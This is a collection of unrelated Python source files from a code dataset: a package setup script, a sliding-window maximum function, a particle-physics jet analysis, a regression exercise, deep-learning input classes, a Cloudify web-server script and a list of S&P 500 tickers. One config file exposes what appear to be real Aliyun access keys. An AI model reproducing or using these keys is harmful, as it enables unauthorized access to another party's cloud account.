setup\n\nrequirements = ['pyyaml']\ntests_require = ['mock']\n\n# Add Python 2.6 compatibility libraries\n(major, minor, rev) = platform.python_version_tuple()\nif float('%s.%s' % (major, minor)) < 2.7:\n requirements.append('argparse')\n requirements.append('logutils')\n tests_require.append('unittest2')\n\nsetup(name='helper',\n version='2.2.3',\n classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Environment :: Console',\n 'Environment :: MacOS X',\n 'Environment :: No Input/Output (Daemon)',\n #'Environment :: Win32 (MS Windows)',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: BSD License',\n 'Natural Language :: English',\n 'Operating System :: MacOS',\n #'Operating System :: Microsoft :: Windows',\n 'Operating System :: POSIX',\n 'Operating System :: POSIX :: BSD',\n 'Operating System :: POSIX :: Linux',\n 'Operating System :: Unix',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.6',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.2',\n 'Programming Language :: Python :: 3.3',\n 'Programming Language :: Python :: Implementation :: CPython',\n 'Programming Language :: Python :: Implementation :: PyPy',\n 'Topic :: Software Development :: Libraries',\n 'Topic :: Software Development :: Libraries :: Python Modules'],\n description=('Development library for quickly writing configurable '\n 'applications and daemons'),\n long_description=open('README.rst').read(),\n license=open('LICENSE').read(),\n author='Gavin M. Roy',\n author_email='gavinmroy@gmail.com',\n url='https://helper.readthedocs.org',\n packages=['helper'],\n package_data={'': ['LICENSE', 'README.rst']},\n install_requires=requirements,\n tests_require=tests_require,\n zip_safe=True)\n","sub_path":"build/helper/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"278173484","text":"# -*- coding: utf-8 -*-\n# auther:gaoshuai\n# 2019/1/8 下午5:29\n\n\n# odps配置\nproject_name = \"uxin_db_bc\"\naccess_id = \"LTAIywH3UrDpa17F\"\naccess_key = \"AAmVTXbSrkbEmu45si4LE4o0NQRCq6\"\nend_point = \"http://service.odps.aliyun.com/api\"\ntunnel_endpoint = \"http://dt.odps.aliyun.com\"\nlog_view_host = \"http://logview.odps.aliyun.com\"\nhttps_check = \"true\"\n","sub_path":"pyodps_vip_data/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"409761927","text":"from collections import deque\ndef max_of_subarray_of_k(arr,n,k):\n\n dq = deque()\n\n for i in range(k):\n\n while len(dq) >0 and arr[dq[-1]] < arr[i]:\n\n dq.pop()\n dq.append(i)\n\n for j in range(k,n):\n\n print(arr[dq[0]])\n\n while len(dq) > 0 and dq[0] <= j-k:\n dq.popleft()\n\n while len(dq) > 0 and arr[dq[-1]] < arr[j]:\n dq.pop()\n dq.append(j)\n\n print(arr[dq[0]])\n\nmax_of_subarray_of_k([20,40,30,10,60],5,3)\n","sub_path":"queues/max_of_subarray_of_k.py","file_name":"max_of_subarray_of_k.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"307728477","text":"import ROOT\nimport os\nimport sys\nfrom array import array\n\nMAXMUFRAC=0.5\n\ndef runJetAnalysis(t):\n \"\"\"fills histograms to determine prefiring probability\"\"\"\n\n jetPt=[30.0, 36.0, 43.0, 52.0, 63.0, 75.0, 91.0, 109.0, 131.0, 158.0, 190.0, 228.0, 274.0, 397.0, 574.0, 830.0, 1200.0]\n jetEta=[0, 1., 1.5, 2., 2.25, 2.5, 2.75, 3., 3.5]\n histos={\n 'njets' : ROOT.TH1D('njets',';Jet multiplicity;Events',10,0,10),\n 'jetpt' : ROOT.TH1D('jetpt',';Transverse momentum [GeV];Jets',len(jetPt)-1,array('d',jetPt)),\n 'jeteta' : ROOT.TH1D('jeteta',';Pseudo-rapidity;Jets',len(jetEta)-1,array('d',jetEta)),\n 'jetetapt' : ROOT.TH2D('jetpteta',';Pseudo-rapidity;Transverse momentum [GeV];Events',len(jetEta)-1,array('d',jetEta),len(jetPt)-1,array('d',jetPt)),\n 'jetetaphi' : ROOT.TH2D('jetetaphi',';Pseudo-rapidity;#phi [rad];Events',57, -3, 3, 72, -3.1415, 3.1415),\n 'jetemf' : ROOT.TH1D('jetemf',';e.m. fraction;Events',10,0,1),\n }\n for key in histos:\n histos[key].SetDirectory(0)\n histos[key].Sumw2()\n\n def fillHisto(val,name,cat=None):\n key='{0}_{1}'.format(cat,name) if cat else name\n if not key in histos:\n histos[key]=histos[name].Clone(key)\n histos[key].Reset('ICE')\n if isinstance(val,float) or isinstance(val,int):\n histos[key].Fill(val)\n else:\n histos[key].Fill(*val)\n\n for ientry in xrange(0,1000): #t.GetEntries()):\n t.GetEntry(ientry)\n #print ientry,'/',t.GetEntries()\n \n #select events\n hasHotSpotJet=False\n hasVeryFwdJet=True\n\n selJets=[]\n for j in xrange(0,t.jet_p4.size()):\n\n pdgid=t.jet_pdgid[j]\n if pdgid!=0: continue\n\n emfrac=t.jet_neutralEmFrac[j]\n mufrac=t.jet_muFrac[j]\n if mufrac>MAXMUFRAC : continue\n\n eta,phi=t.jet_p4[j].Eta(),t.jet_p4[j].Phi() \n #if t.run>=280919 and t.run<=284044:\n # if abs(eta+2.81)<0.2 and abs(phi-2.07)<0.2:\n # hasHotSpotJet=True\n\n p4=ROOT.TLorentzVector(t.jet_p4[j].Px(),t.jet_p4[j].Py(),t.jet_p4[j].Pz(),t.jet_p4[j].E())\n fillHisto(p4.Pt(), 'jetpt')\n fillHisto(abs(p4.Eta()), 'jeteta')\n fillHisto(p4.Pt(), 'jetpt')\n fillHisto([p4.Eta(),p4.Pt()], 'jetetapt')\n fillHisto([abs(p4.Eta()),p4.Phi()],'jetetaphi')\n fillHisto(emfrac, 'jetemf')\n if abs(eta)>=2:\n if abs(eta)<3.25 : selJets.append(p4)\n else : hasVeryFwdJet=True\n\n njets=len(selJets)\n fillHisto(njets,'njets')\n if njets==0 : continue \n\n for key in histos:\n histos[key].Draw()\n raw_input(key)\n\n\"\"\"\n #match to L1EG\n for ieg in xrange(0,t.L1EG_p4.size()):\n\n if t.L1EG_p4[ieg].Pt()<30: continue\n isIso=(t.L1EG_iso[ieg]&0x1)\n if not isIso: continue\n\n p4=ROOT.TLorentzVector(t.L1EG_p4[ieg].Px(),t.L1EG_p4[ieg].Py(),t.L1EG_p4[ieg].Pz(),t.L1EG_p4[ieg].E())\n for j in selJets:\n if p4.DeltaR(j)>0.4 : continue\n histos[\"jetmatchl1eg\"].fill(p4.Eta(),p4.Phi())\n\n\n\n if ( L1EG_p4[iEG].Pt() > 30. and (L1EG_iso[iEG] & 0x1) and DeltaR(L1EG_p4[iEG], jet) < 0.4 ) {\n match_bx |= bit(L1EG_bx[iEG]+2);\n if ( jet.Pt() > 30. and L1EG_bx[iEG] == -1 ) {\n hJet30EGEtaPhi_->Fill(L1EG_p4[iEG].Eta(), L1EG_p4[iEG].Phi(), jweight);\n }\n }\n if ( etaBinCut(jet) and L1EG_bx[iEG] == -1 and (L1EG_iso[iEG] & 0x1) ) {\n if ( DeltaR(L1EG_p4[iEG], jet) < 0.4 ) {\n if ( L1EG_p4[iEG].Pt() > 20. ) match_thr |= bit(0);\n if ( L1EG_p4[iEG].Pt() > 30. ) match_thr |= bit(1);\n if ( L1EG_p4[iEG].Pt() > 40. ) match_thr |= bit(2);\n }\n }\n if ( etaBinCut(jet) and (L1EG_iso[iEG] & 0x1) and L1EG_p4[iEG].Pt() > 20. ) {\n if ( L1EG_bx[iEG] == -1 ) hJetEGdeltaR_bxm1_->Fill(DeltaR(L1EG_p4[iEG], jet), jweight);\n if ( L1EG_bx[iEG] == 0 ) hJetEGdeltaR_bx0_->Fill(DeltaR(L1EG_p4[iEG], jet), jweight);\n if ( L1EG_bx[iEG] == 1 ) hJetEGdeltaR_bx1_->Fill(DeltaR(L1EG_p4[iEG], jet), jweight);\n }\n }\n\n hJetPtEtaEGeffDenom_->Fill(std::abs(jet.Eta()), jet.Pt(), jweight);\n if ( match_bx & bit(-2+2) ) hJetPtEtaEGeffNum_bxm2_->Fill(std::abs(jet.Eta()), jet.Pt(), jweight);\n if ( match_bx & bit(-1+2) ) hJetPtEtaEGeffNum_bxm1_->Fill(std::abs(jet.Eta()), jet.Pt(), jweight);\n if ( match_bx & bit( 0+2) ) hJetPtEtaEGeffNum_bx0_ ->Fill(std::abs(jet.Eta()), jet.Pt(), jweight);\n if ( match_bx & bit( 1+2) ) hJetPtEtaEGeffNum_bx1_ ->Fill(std::abs(jet.Eta()), jet.Pt(), jweight);\n if ( match_bx & bit( 2+2) ) hJetPtEtaEGeffNum_bx2_ ->Fill(std::abs(jet.Eta()), jet.Pt(), jweight);\n\n if ( etaBinCut(jet) ) {\n hJetEGm1thrDenom_->Fill(jet.Pt(), jweight);\n if ( match_thr & bit(0) ) hJetEGm1thrNum_EGlow_->Fill(jet.Pt(), jweight);\n if ( match_thr & bit(1) ) hJetEGm1thrNum_EGmed_->Fill(jet.Pt(), jweight);\n if ( match_thr & bit(2) ) hJetEGm1thrNum_EGhigh_->Fill(jet.Pt(), jweight);\n }\n }\n\n if ( forwardJets.size() == 1 and not vetoEvent ) {\n LorentzVector jet = forwardJets[0];\n if ( hjetKinReweight_ != nullptr ) {\n weight *= hjetKinReweight_->GetBinContent(hjetKinReweight_->FindBin(std::abs(jet.Eta()), jet.Pt()));\n }\n hJetPtEtaFinOReffDenom_->Fill(std::abs(jet.Eta()), jet.Pt(), weight);\n if ( etaBinCut(jet) ) hJetL1ADenom_->Fill(jet.Pt(), weight);\n if ( L1GtBx[0] ) {\n hJetPtEtaFinOReffNum_bxm2_->Fill(std::abs(jet.Eta()), jet.Pt(), weight);\n if ( etaBinCut(jet) ) hJetL1ANum_bxm2_->Fill(jet.Pt(), weight);\n }\n if ( L1GtBx[1] ) {\n hJetPtEtaFinOReffNum_bxm1_->Fill(std::abs(jet.Eta()), jet.Pt(), weight);\n if ( etaBinCut(jet) ) hJetL1ANum_bxm1_->Fill(jet.Pt(), weight);\n }\n if ( L1GtBx[2] ) {\n hJetPtEtaFinOReffNum_bx0_->Fill(std::abs(jet.Eta()), jet.Pt(), weight);\n if ( etaBinCut(jet) ) hJetL1ANum_bx0_->Fill(jet.Pt(), weight);\n }\n if ( L1GtBx[3] ) {\n hJetPtEtaFinOReffNum_bx1_->Fill(std::abs(jet.Eta()), jet.Pt(), weight);\n if ( etaBinCut(jet) ) hJetL1ANum_bx1_->Fill(jet.Pt(), weight);\n }\n if ( L1GtBx[4] ) {\n hJetPtEtaFinOReffNum_bx2_->Fill(std::abs(jet.Eta()), jet.Pt(), weight);\n if ( etaBinCut(jet) ) hJetL1ANum_bx2_->Fill(jet.Pt(), weight);\n }\n }\n\n return kTRUE;\n}\n\"\"\"\n\ndef main():\n dirList=['/eos/cms/store/cmst3/group/top/RunIIReReco/l1prefire/Data13TeV_2017C_JetHT']\n\n t=ROOT.TChain('prefiringVBFAna/l1prefire')\n for d in dirList:\n for f in os.listdir(d):\n t.AddFile(os.path.join(d,f))\n\n runJetAnalysis(t)\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","sub_path":"TopAnalysis/test/analysis/l1prefire/runJetAnalysis.py","file_name":"runJetAnalysis.py","file_ext":"py","file_size_in_byte":6869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"182050209","text":"import numpy as np\n\n\ndef add_intercept(x):\n \"\"\"Adds a column of 1's to the non-empty numpy.ndarray x.\n Args:\n x: has to be an numpy.ndarray, a vector of dimension m * 1.\n Returns:\n X as a numpy.ndarray, a vector of dimension m * 2.\n None if x is not a numpy.ndarray.\n None if x is a empty numpy.ndarray.\n Raises:\n This function should not raise any Exception.\n \"\"\"\n if (not isinstance(x, np.ndarray) or len(x) == 0):\n return None\n if (x.ndim == 1):\n x2 = np.array([x])\n else:\n x2 = x.T\n lin = x2.shape[1]\n v1 = np.full((1, lin), 1)\n return np.concatenate((v1.T, x2.T), axis=1).astype(float)\n\n\ndef predict_(x, theta):\n \"\"\"Computes the vector of prediction y_hat from two non-empty np.ndarray.\n Args:\n x: has to be an np.ndarray, a vector of dimension m * 1.\n theta: has to be an np.ndarray, a vector of dimension 2 * 1.\n Returns:\n y_hat as a np.ndarray, a vector of dimension m * 1.\n None if x or theta are empty np.ndarray.\n None if x or theta dimensions are not appropriate.\n Raises:\n This function should not raise any Exceptions.\n \"\"\"\n if (not isinstance(x, np.ndarray) or not isinstance(theta, np.ndarray)\n or len(x) == 0 or len(theta) != 2):\n return None\n else:\n x = add_intercept(x)\n return x.dot(theta)\n\n\nif __name__ == '__main__':\n x = np.arange(1, 6)\n # Example 1:\n theta1 = np.array([5, 0])\n print(predict_(x, theta1))\n # Do you remember why y_hat contains only 5's here?\n # Example 2:\n theta2 = np.array([0, 1])\n print(predict_(x, theta2))\n # Do you remember why y_hat == x here?\n # Example 3:\n theta3 = np.array([5, 3])\n print(predict_(x, theta3))\n # Example 4:\n theta4 = np.array([-3, 1])\n print(predict_(x, theta4))\n","sub_path":"ex03/prediction.py","file_name":"prediction.py","file_ext":"py","file_size_in_byte":1815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"641613406","text":"import cudarray as ca\nimport numpy as np\nfrom ..input import Input\n\n\nclass TransferInput(Input):\n def __init__(self, x1, x2, batch_size=128):\n super(TransferInput, self).__init__(x1, batch_size)\n self.x2 = x2\n self.batch_size2 = batch_size if batch_size > 0 else x2.shape[0]\n self.n_samples2 = x2.shape[0]\n self.n_batches2 = int(np.ceil(float(self.n_samples2) / self.batch_size))\n\n def batches(self, phase = 'train', domain = 'target'):\n if phase == 'train':\n for batch_start, batch_stop in self._batch_slices2(domain = 'target'):\n x1_batch = ca.array(self.x[batch_start:batch_stop])\n x2_batch = ca.array(self.x2[batch_start:batch_stop]) \n yield {'x1': x1_batch, 'x2': x2_batch}\n elif phase == 'test':\n if domain == 'target': \n for batch_start, batch_stop in self._batch_slices2(domain):\n x1_batch = ca.array(self.x[batch_start:batch_stop])\n yield {'x1': x1_batch}\n elif domain == 'source':\n for batch_start, batch_stop in self._batch_slices2(domain):\n x2_batch = ca.array(self.x2[batch_start:batch_stop]) \n yield {'x2': x2_batch}\n \n def _batch_slices2(self, domain = 'target'):\n if domain == 'target': \n for b in range(self.n_batches):\n batch_start = b * self.batch_size\n batch_stop = min(self.n_samples, batch_start + self.batch_size)\n yield batch_start, batch_stop\n elif domain == 'source':\n for b in range(self.n_batches2):\n batch_start = b * self.batch_size2\n batch_stop = min(self.n_samples2, batch_start + self.batch_size2)\n yield batch_start, batch_stop\n \n \n \n @property\n def x_shape(self):\n return (self.batch_size,) + self.x.shape[1:] + self.x2.shape[1:] \n\n @property\n def shapes(self):\n return {'x_shape': self.x_shape}\n\n\n\nclass SupervisedTransferInput(TransferInput):\n def __init__(self, x1, x2, y, batch_size=128):\n super(SupervisedTransferInput, self).__init__(x1, x2, batch_size)\n if x1.shape[0] != y.shape[0]:\n raise ValueError('shape mismatch between x and y')\n self.y = y\n\n def batches(self):\n for batch_start, batch_stop in self._batch_slices():\n x1_batch = ca.array(self.x[batch_start:batch_stop])\n x2_batch = ca.array(self.x2[batch_start:batch_stop])\n y_batch = ca.array(self.y[batch_start:batch_stop])\n yield {'x1': x1_batch, 'x2': x2_batch, 'y': y_batch}\n\n @property\n def y_shape(self):\n return (self.batch_size,) + self.y.shape[1:]\n \n @property\n def shapes(self):\n return {'x_shape': self.x_shape, 'y_shape': self.y_shape}","sub_path":"deeppy/transfernet/input.py","file_name":"input.py","file_ext":"py","file_size_in_byte":2959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"255709729","text":"import os\nimport sys\nimport subprocess\nfrom cloudify import ctx\n\nIS_WIN = os.name == 'nt'\n\n\ndef run_server(_path, _port):\n webserver_cmd = [sys.executable, '-m', 'SimpleHTTPServer', str(_port)]\n if not IS_WIN:\n webserver_cmd.insert(0, 'nohup')\n ctx.logger.info('Serving wagon port: {0}'.format(str(_port)))\n with open(os.devnull, 'wb') as dn:\n process = subprocess.Popen(webserver_cmd, stdout=dn, stderr=dn, cwd=_path)\n return process.pid\n\n\ndef set_pid(_pid):\n ctx.logger.info('Setting `pid` runtime property: {0}'.format(str(pid)))\n ctx.instance.runtime_properties['pid'] = _pid\n\n\nif __name__ == '__main__':\n\n wagon_directory = os.path.dirname(ctx.instance.runtime_properties['wagon'])\n port = ctx.node.properties['port']\n pid = run_server(wagon_directory, port)\n set_pid(pid)\n","sub_path":"scripts/wagon/start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"385559286","text":"'''\nCreated on 15 Mar 2019\n\n@author: francescoferrari\n'''\n\nsp500 = [\n ('A','Health Care','USD'),\n ('AAL','Industrials','USD'),\n ('AAP','Consumer Discretionary','USD'),\n ('AAPL','Information Technology','USD'),\n ('ABBV','Health Care','USD'),\n ('ABC','Health Care','USD'),\n ('ABMD','Health Care','USD'),\n ('ABT','Health Care','USD'),\n ('ACN','Information Technology','USD'),\n ('ADBE','Information Technology','USD'),\n ('ADI','Information Technology','USD'),\n ('ADM','Consumer Staples','USD'),\n ('ADP','Information Technology','USD'),\n ('ADS','Information Technology','USD'),\n ('ADSK','Information Technology','USD'),\n ('AEE','Utilities','USD'),\n ('AEP','Utilities','USD'),\n ('AES','Utilities','USD'),\n ('AFL','Financials','USD'),\n ('AGN','Health Care','USD'),\n ('AIG','Financials','USD'),\n ('AIV','Real Estate','USD'),\n ('AIZ','Financials','USD'),\n ('AJG','Financials','USD'),\n ('AKAM','Information Technology','USD'),\n ('ALB','Materials','USD'),\n ('ALGN','Health Care','USD'),\n ('ALK','Industrials','USD'),\n ('ALL','Financials','USD'),\n ('ALLE','Industrials','USD'),\n ('ALXN','Health Care','USD'),\n ('AMAT','Information Technology','USD'),\n ('AMD','Information Technology','USD'),\n ('AME','Industrials','USD'),\n ('AMG','Financials','USD'),\n ('AMGN','Health Care','USD'),\n ('AMP','Financials','USD'),\n ('AMT','Real Estate','USD'),\n ('AMZN','Consumer Discretionary','USD'),\n ('ANET','Information Technology','USD'),\n ('ANSS','Information Technology','USD'),\n ('ANTM','Health Care','USD'),\n ('AON','Financials','USD'),\n ('AOS','Industrials','USD'),\n ('APA','Energy','USD'),\n ('APC','Energy','USD'),\n ('APD','Materials','USD'),\n ('APH','Information Technology','USD'),\n ('APTV','Consumer Discretionary','USD'),\n ('ARE','Real Estate','USD'),\n ('ARNC','Industrials','USD'),\n ('ATVI','Communication Services','USD'),\n ('AVB','Real Estate','USD'),\n ('AVGO','Information Technology','USD'),\n ('AVY','Materials','USD'),\n ('AWK','Utilities','USD'),\n ('AXP','Financials','USD'),\n ('AZO','Consumer Discretionary','USD'),\n ('BA','Industrials','USD'),\n ('BAC','Financials','USD'),\n ('BAX','Health Care','USD'),\n ('BBT','Financials','USD'),\n ('BBY','Consumer Discretionary','USD'),\n ('BDX','Health Care','USD'),\n ('BEN','Financials','USD'),\n ('BF-B','Consumer Staples','USD'),\n ('BHF','Financials','USD'),\n ('BHGE','Energy','USD'),\n ('BIIB','Health Care','USD'),\n ('BK','Financials','USD'),\n ('BKNG','Consumer Discretionary','USD'),\n ('BLK','Financials','USD'),\n ('BLL','Materials','USD'),\n ('BMY','Health Care','USD'),\n ('BR','Information Technology','USD'),\n ('BRK-B','Financials','USD'),\n ('BSX','Health Care','USD'),\n ('BWA','Consumer Discretionary','USD'),\n ('BXP','Real Estate','USD'),\n ('C','Financials','USD'),\n ('CAG','Consumer Staples','USD'),\n ('CAH','Health Care','USD'),\n ('CAT','Industrials','USD'),\n ('CB','Financials','USD'),\n ('CBOE','Financials','USD'),\n ('CBRE','Real Estate','USD'),\n ('CBS','Communication Services','USD'),\n ('CCI','Real Estate','USD'),\n ('CCL','Consumer Discretionary','USD'),\n ('CDNS','Information Technology','USD'),\n ('CE','Materials','USD'),\n ('CELG','Health Care','USD'),\n ('CERN','Health Care','USD'),\n ('CF','Materials','USD'),\n ('CFG','Financials','USD'),\n ('CHD','Consumer Staples','USD'),\n ('CHRW','Industrials','USD'),\n ('CHTR','Communication Services','USD'),\n ('CI','Health Care','USD'),\n ('CINF','Financials','USD'),\n ('CL','Consumer Staples','USD'),\n ('CLX','Consumer Staples','USD'),\n ('CMA','Financials','USD'),\n ('CMCSA','Communication Services','USD'),\n ('CME','Financials','USD'),\n ('CMG','Consumer Discretionary','USD'),\n ('CMI','Industrials','USD'),\n ('CMS','Utilities','USD'),\n ('CNC','Health Care','USD'),\n ('CNP','Utilities','USD'),\n ('COF','Financials','USD'),\n ('COG','Energy','USD'),\n ('COO','Health Care','USD'),\n ('COP','Energy','USD'),\n ('COST','Consumer Staples','USD'),\n ('COTY','Consumer Staples','USD'),\n ('CPB','Consumer Staples','USD'),\n ('CPRI','Consumer Discretionary','USD'),\n ('CPRT','Industrials','USD'),\n ('CRM','Information Technology','USD'),\n ('CSCO','Information Technology','USD'),\n ('CSX','Industrials','USD'),\n ('CTAS','Industrials','USD'),\n ('CTL','Communication Services','USD'),\n ('CTSH','Information Technology','USD'),\n ('CTXS','Information Technology','USD'),\n ('CVS','Health Care','USD'),\n ('CVX','Energy','USD'),\n ('CXO','Energy','USD'),\n ('D','Utilities','USD'),\n ('DAL','Industrials','USD'),\n ('DE','Industrials','USD'),\n ('DFS','Financials','USD'),\n ('DG','Consumer Discretionary','USD'),\n ('DGX','Health Care','USD'),\n ('DHI','Consumer Discretionary','USD'),\n ('DHR','Health Care','USD'),\n ('DIS','Communication Services','USD'),\n ('DISCA','Communication Services','USD'),\n ('DISCK','Communication Services','USD'),\n ('DISH','Communication Services','USD'),\n ('DLR','Real Estate','USD'),\n ('DLTR','Consumer Discretionary','USD'),\n ('DOV','Industrials','USD'),\n ('DRE','Real Estate','USD'),\n ('DRI','Consumer Discretionary','USD'),\n ('DTE','Utilities','USD'),\n ('DUK','Utilities','USD'),\n ('DVA','Health Care','USD'),\n ('DVN','Energy','USD'),\n ('DWDP','Materials','USD'),\n ('DXC','Information Technology','USD'),\n ('EA','Communication Services','USD'),\n ('EBAY','Consumer Discretionary','USD'),\n ('ECL','Materials','USD'),\n ('ED','Utilities','USD'),\n ('EFX','Industrials','USD'),\n ('EIX','Utilities','USD'),\n ('EL','Consumer Staples','USD'),\n ('EMN','Materials','USD'),\n ('EMR','Industrials','USD'),\n ('EOG','Energy','USD'),\n ('EQIX','Real Estate','USD'),\n ('EQR','Real Estate','USD'),\n ('ES','Utilities','USD'),\n ('ESS','Real Estate','USD'),\n ('ETFC','Financials','USD'),\n ('ETN','Industrials','USD'),\n ('ETR','Utilities','USD'),\n ('EVRG','Utilities','USD'),\n ('EW','Health Care','USD'),\n ('EXC','Utilities','USD'),\n ('EXPD','Industrials','USD'),\n ('EXPE','Consumer Discretionary','USD'),\n ('EXR','Real Estate','USD'),\n ('F','Consumer Discretionary','USD'),\n ('FANG','Energy','USD'),\n ('FAST','Industrials','USD'),\n ('FB','Communication Services','USD'),\n ('FBHS','Industrials','USD'),\n ('FCX','Materials','USD'),\n ('FDX','Industrials','USD'),\n ('FE','Utilities','USD'),\n ('FFIV','Information Technology','USD'),\n ('FIS','Information Technology','USD'),\n ('FISV','Information Technology','USD'),\n ('FITB','Financials','USD'),\n ('FL','Consumer Discretionary','USD'),\n ('FLIR','Information Technology','USD'),\n ('FLR','Industrials','USD'),\n ('FLS','Industrials','USD'),\n ('FLT','Information Technology','USD'),\n ('FMC','Materials','USD'),\n ('FOX','Communication Services','USD'),\n ('FOXA','Communication Services','USD'),\n ('FRC','Financials','USD'),\n ('FRT','Real Estate','USD'),\n ('FTI','Energy','USD'),\n ('FTNT','Information Technology','USD'),\n ('FTV','Industrials','USD'),\n ('GD','Industrials','USD'),\n ('GE','Industrials','USD'),\n ('GILD','Health Care','USD'),\n ('GIS','Consumer Staples','USD'),\n ('GLW','Information Technology','USD'),\n ('GM','Consumer Discretionary','USD'),\n ('GOOG','Communication Services','USD'),\n ('GOOGL','Communication Services','USD'),\n ('GPC','Consumer Discretionary','USD'),\n ('GPN','Information Technology','USD'),\n ('GPS','Consumer Discretionary','USD'),\n ('GRMN','Consumer Discretionary','USD'),\n ('GS','Financials','USD'),\n ('GT','Consumer Discretionary','USD'),\n ('GWW','Industrials','USD'),\n ('HAL','Energy','USD'),\n ('HAS','Consumer Discretionary','USD'),\n ('HBAN','Financials','USD'),\n ('HBI','Consumer Discretionary','USD'),\n ('HCA','Health Care','USD'),\n ('HCP','Real Estate','USD'),\n ('HD','Consumer Discretionary','USD'),\n ('HES','Energy','USD'),\n ('HFC','Energy','USD'),\n ('HIG','Financials','USD'),\n ('HII','Industrials','USD'),\n ('HLT','Consumer Discretionary','USD'),\n ('HOG','Consumer Discretionary','USD'),\n ('HOLX','Health Care','USD'),\n ('HON','Industrials','USD'),\n ('HP','Energy','USD'),\n ('HPE','Information Technology','USD'),\n ('HPQ','Information Technology','USD'),\n ('HRB','Consumer Discretionary','USD'),\n ('HRL','Consumer Staples','USD'),\n ('HRS','Industrials','USD'),\n ('HSIC','Health Care','USD'),\n ('HST','Real Estate','USD'),\n ('HSY','Consumer Staples','USD'),\n ('HUM','Health Care','USD'),\n ('IBM','Information Technology','USD'),\n ('ICE','Financials','USD'),\n ('IDXX','Health Care','USD'),\n ('IFF','Materials','USD'),\n ('ILMN','Health Care','USD'),\n ('INCY','Health Care','USD'),\n ('INFO','Industrials','USD'),\n ('INTC','Information Technology','USD'),\n ('INTU','Information Technology','USD'),\n ('IP','Materials','USD'),\n ('IPG','Communication Services','USD'),\n ('IPGP','Information Technology','USD'),\n ('IQV','Health Care','USD'),\n ('IR','Industrials','USD'),\n ('IRM','Real Estate','USD'),\n ('ISRG','Health Care','USD'),\n ('IT','Information Technology','USD'),\n ('ITW','Industrials','USD'),\n ('IVZ','Financials','USD'),\n ('JBHT','Industrials','USD'),\n ('JCI','Industrials','USD'),\n ('JEC','Industrials','USD'),\n ('JEF','Financials','USD'),\n ('JKHY','Information Technology','USD'),\n ('JNJ','Health Care','USD'),\n ('JNPR','Information Technology','USD'),\n ('JPM','Financials','USD'),\n ('JWN','Consumer Discretionary','USD'),\n ('K','Consumer Staples','USD'),\n ('KEY','Financials','USD'),\n ('KEYS','Information Technology','USD'),\n ('KHC','Consumer Staples','USD'),\n ('KIM','Real Estate','USD'),\n ('KLAC','Information Technology','USD'),\n ('KMB','Consumer Staples','USD'),\n ('KMI','Energy','USD'),\n ('KMX','Consumer Discretionary','USD'),\n ('KO','Consumer Staples','USD'),\n ('KR','Consumer Staples','USD'),\n ('KSS','Consumer Discretionary','USD'),\n ('KSU','Industrials','USD'),\n ('L','Financials','USD'),\n ('LB','Consumer Discretionary','USD'),\n ('LEG','Consumer Discretionary','USD'),\n ('LEN','Consumer Discretionary','USD'),\n ('LH','Health Care','USD'),\n ('LIN','Materials','USD'),\n ('LKQ','Consumer Discretionary','USD'),\n ('LLL','Industrials','USD'),\n ('LLY','Health Care','USD'),\n ('LMT','Industrials','USD'),\n ('LNC','Financials','USD'),\n ('LNT','Utilities','USD'),\n ('LOW','Consumer Discretionary','USD'),\n ('LRCX','Information Technology','USD'),\n ('LUV','Industrials','USD'),\n ('LW','Consumer Staples','USD'),\n ('LYB','Materials','USD'),\n ('M','Consumer Discretionary','USD'),\n ('MA','Information Technology','USD'),\n ('MAA','Real Estate','USD'),\n ('MAC','Real Estate','USD'),\n ('MAR','Consumer Discretionary','USD'),\n ('MAS','Industrials','USD'),\n ('MAT','Consumer Discretionary','USD'),\n ('MCD','Consumer Discretionary','USD'),\n ('MCHP','Information Technology','USD'),\n ('MCK','Health Care','USD'),\n ('MCO','Financials','USD'),\n ('MDLZ','Consumer Staples','USD'),\n ('MDT','Health Care','USD'),\n ('MET','Financials','USD'),\n ('MGM','Consumer Discretionary','USD'),\n ('MHK','Consumer Discretionary','USD'),\n ('MKC','Consumer Staples','USD'),\n ('MLM','Materials','USD'),\n ('MMC','Financials','USD'),\n ('MMM','Industrials','USD'),\n ('MNST','Consumer Staples','USD'),\n ('MO','Consumer Staples','USD'),\n ('MOS','Materials','USD'),\n ('MPC','Energy','USD'),\n ('MRK','Health Care','USD'),\n ('MRO','Energy','USD'),\n ('MS','Financials','USD'),\n ('MSCI','Financials','USD'),\n ('MSFT','Information Technology','USD'),\n ('MSI','Information Technology','USD'),\n ('MTB','Financials','USD'),\n ('MTD','Health Care','USD'),\n ('MU','Information Technology','USD'),\n ('MXIM','Information Technology','USD'),\n ('MYL','Health Care','USD'),\n ('NBL','Energy','USD'),\n ('NCLH','Consumer Discretionary','USD'),\n ('NDAQ','Financials','USD'),\n ('NEE','Utilities','USD'),\n ('NEM','Materials','USD'),\n ('NFLX','Communication Services','USD'),\n ('NFX','Energy','USD'),\n ('NI','Utilities','USD'),\n ('NKE','Consumer Discretionary','USD'),\n ('NKTR','Health Care','USD'),\n ('NLSN','Industrials','USD'),\n ('NOC','Industrials','USD'),\n ('NOV','Energy','USD'),\n ('NRG','Utilities','USD'),\n ('NSC','Industrials','USD'),\n ('NTAP','Information Technology','USD'),\n ('NTRS','Financials','USD'),\n ('NUE','Materials','USD'),\n ('NVDA','Information Technology','USD'),\n ('NWL','Consumer Discretionary','USD'),\n ('NWS','Communication Services','USD'),\n ('NWSA','Communication Services','USD'),\n ('O','Real Estate','USD'),\n 